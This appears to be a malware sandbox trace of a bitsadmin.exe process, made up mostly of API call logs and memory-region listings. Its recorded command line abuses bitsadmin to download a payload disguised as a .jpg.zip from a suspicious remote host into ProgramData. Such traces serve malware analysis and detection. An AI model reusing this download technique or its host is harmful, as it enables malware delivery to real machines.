[0064.032] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20de88, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de88*=0x5) returned 1
[0064.032] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de78 | out: lpConsoleScreenBufferInfo=0x20de78) returned 1
[0064.032] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20de90, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de90*=0x7) returned 1
[0064.032] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de6c | out: lpConsoleScreenBufferInfo=0x20de6c) returned 1
[0064.033] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de84, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de84*=0x8) returned 1
[0064.033] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.033] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de74 | out: lpConsoleScreenBufferInfo=0x20de74) returned 1
[0064.033] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de8c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de8c*=0x8) returned 1
[0064.033] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.034] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de68 | out: lpConsoleScreenBufferInfo=0x20de68) returned 1
[0064.034] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x20de80, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de80*=0xd) returned 1
[0064.034] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.034] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de78 | out: lpConsoleScreenBufferInfo=0x20de78) returned 1
[0064.034] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20de90, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de90*=0xa) returned 1
[0064.034] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.035] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de60 | out: lpConsoleScreenBufferInfo=0x20de60) returned 1
[0064.035] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20de78, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de78*=0xa) returned 1
[0064.035] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.035] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de68 | out: lpConsoleScreenBufferInfo=0x20de68) returned 1
[0064.035] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de80, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de80*=0x8) returned 1
[0064.036] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.036] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20de8c | out: _Buffer="1") returned 1
[0064.036] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20de98 | out: _Buffer="1") returned 1
[0064.036] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de68 | out: lpConsoleScreenBufferInfo=0x20de68) returned 1
[0064.036] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20de80, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de80*=0x5) returned 1
[0064.036] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.036] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de70 | out: lpConsoleScreenBufferInfo=0x20de70) returned 1
[0064.037] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de88, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de88*=0x8) returned 1
[0064.037] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.037] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20de94 | out: _Buffer="189952") returned 6
[0064.037] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20de98 | out: _Buffer="189952") returned 6
[0064.037] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20de94 | out: _Buffer="100") returned 3
[0064.037] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de90 | out: lpConsoleScreenBufferInfo=0x20de90) returned 1
[0064.037] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x20dea8, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20dea8*=0x16) returned 1
[0064.037] CoTaskMemFree (pv=0x378380)
[0064.038] IBackgroundCopyJob:Complete (This=0x36a614) returned 0x0
[0064.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de94 | out: lpConsoleScreenBufferInfo=0x20de94) returned 1
[0064.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de68 | out: lpConsoleScreenBufferInfo=0x20de68) returned 1
[0064.045] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20de80, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de80*=0x2) returned 1
[0064.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de68 | out: lpConsoleScreenBufferInfo=0x20de68) returned 1
[0064.045] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x20de80, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de80*=0x14) returned 1
[0064.046] GetCurrentThreadId () returned 0xb78
[0064.046] PostThreadMessageW (idThread=0xb78, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0064.046] PeekMessageW (in: lpMsg=0x20f898, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f898) returned 1
[0064.046] IUnknown:Release (This=0x36a614) returned 0x1
[0064.047] IUnknown:Release (This=0x36a53c) returned 0x0
[0064.047] CoUninitialize ()
[0064.047] IUnknown:Release (This=0x380c70) returned 0x2
[0064.047] IUnknown:Release (This=0x380c70) returned 0x1
[0064.047] IUnknown:Release (This=0x380c70) returned 0x0
[0064.047] IUnknown:Release (This=0x36a614) returned 0x1
[0064.047] CoTaskMemFree (pv=0x380c70)
[0064.050] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0064.050] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0064.051] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.051] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0064.051] CloseHandle (hObject=0x80) returned 1
[0064.051] exit (_Code=0)
Thread:
id = 118
os_tid = 0xb8c
Thread:
id = 119
os_tid = 0xb90
Thread:
id = 120
os_tid = 0xb94
Thread:
id = 121
os_tid = 0xb98
Process:
id = "9"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be280"
os_pid = "0xba8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218 C:\\ProgramData\\tempa\\marxvxinhhmc.jpg"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1216
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1217
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1218
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1219
start_va = 0x1b0000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1220
start_va = 0x400000
end_va = 0x443fff
entry_point = 0x400000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1221
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1222
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1223
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1224
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1225
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1226
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1227
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1228
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1229
start_va = 0xc0000
end_va = 0x187fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1230
start_va = 0x350000
end_va = 0x35ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 1231
start_va = 0x5d0000
end_va = 0x6cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 1232
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1233
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1234
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1235
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1236
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1237
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1238
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1239
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1240
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1241
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1242
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1243
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1244
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1245
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1246
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1247
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1248
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1249
start_va = 0x190000
end_va = 0x196fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 1250
start_va = 0x1a0000
end_va = 0x1a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1251
start_va = 0x1f0000
end_va = 0x2f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1252
start_va = 0x300000
end_va = 0x300fff
entry_point = 0x300000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1253
start_va = 0x310000
end_va = 0x310fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 1254
start_va = 0x320000
end_va = 0x320fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 1255
start_va = 0x6d0000
end_va = 0x12cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 1256
start_va = 0x360000
end_va = 0x3bbfff
entry_point = 0x360000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1257
start_va = 0x360000
end_va = 0x3bbfff
entry_point = 0x360000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1258
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1259
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1260
start_va = 0x450000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 1261
start_va = 0x450000
end_va = 0x52efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 1262
start_va = 0x530000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 1263
start_va = 0x330000
end_va = 0x330fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 1264
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1265
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1266
start_va = 0x340000
end_va = 0x340fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 1267
start_va = 0x3a0000
end_va = 0x3dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 1268
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1269
start_va = 0x13b0000
end_va = 0x13effff
entry_point = 0x0
region_type = private
name = "private_0x00000000013b0000"
filename = ""
Region:
id = 1270
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1271
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1272
start_va = 0x360000
end_va = 0x39bfff
entry_point = 0x360000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1273
start_va = 0x360000
end_va = 0x39bfff
entry_point = 0x360000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1274
start_va = 0x360000
end_va = 0x39bfff
entry_point = 0x360000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1275
start_va = 0x360000
end_va = 0x39bfff
entry_point = 0x360000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1276
start_va = 0x360000
end_va = 0x39bfff
entry_point = 0x360000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1277
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1278
start_va = 0x13f0000
end_va = 0x16befff
entry_point = 0x13f0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1279
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1280
start_va = 0x1750000
end_va = 0x178ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001750000"
filename = ""
Region:
id = 1281
start_va = 0x17a0000
end_va = 0x17dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017a0000"
filename = ""
Region:
id = 1282
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 1283
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1284
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 123
os_tid = 0xbac
[0064.166] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efecc | out: lpSystemTimeAsFileTime=0x1efecc*(dwLowDateTime=0xd6e92130, dwHighDateTime=0x1d469c7))
[0064.166] GetCurrentProcessId () returned 0xba8
[0064.166] GetCurrentThreadId () returned 0xbac
[0064.166] GetTickCount () returned 0x1e06f
[0064.166] QueryPerformanceCounter (in: lpPerformanceCount=0x1efec4 | out: lpPerformanceCount=0x1efec4*=1813811200000) returned 1
[0064.167] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0064.167] __set_app_type (_Type=0x1)
[0064.167] __p__fmode () returned 0x757a31f4
[0064.167] __p__commode () returned 0x757a31fc
[0064.167] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x427f33) returned 0x0
[0064.168] __wgetmainargs (in: _Argc=0x440824, _Argv=0x44082c, _Env=0x440828, _DoWildCard=0, _StartInfo=0x440838 | out: _Argc=0x440824, _Argv=0x44082c, _Env=0x440828) returned 0
[0064.168] _onexit (_Func=0x42925e) returned 0x42925e
[0064.168] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0064.168] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0064.169] AitLogFeatureUsageByApp () returned 0x0
[0064.169] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0064.169] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0064.169] VerifyVersionInfoW (in: lpVersionInformation=0x1efd40, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x1efd40) returned 1
[0064.169] SetLastError (dwErrCode=0x0)
[0064.169] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0064.170] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0064.170] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0064.170] GetCurrentProcess () returned 0xffffffff
[0064.170] GetCurrentThread () returned 0xfffffffe
[0064.170] GetCurrentProcess () returned 0xffffffff
[0064.170] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x42c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x42c3b0*=0x80) returned 1
[0064.170] SetConsoleCtrlHandler (HandlerRoutine=0x4174cb, Add=1) returned 1
[0064.170] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0064.170] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0064.170] SetThreadUILanguage (LangId=0x0) returned 0x409
[0064.170] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0064.171] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0064.171] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0064.172] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0064.172] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0064.172] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0064.172] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0064.172] swprintf_s (in: _Dst=0x1efe38, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0064.172] GetFileType (hFile=0x7) returned 0x2
[0064.173] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1efdac | out: lpMode=0x1efdac) returned 1
[0064.173] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efddc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1efddc*=0x2) returned 1
[0064.173] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x1efde8, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1efde8*=0x24) returned 1
[0064.173] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1efdec, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1efdec*=0x1e) returned 1
[0064.173] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x1efdf0, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1efdf0*=0x29) returned 1
[0064.174] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efdf4, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1efdf4*=0x2) returned 1
[0064.174] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x1efdf8, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1efdf8*=0x5e) returned 1
[0064.174] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x1efdfc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1efdfc*=0x58) returned 1
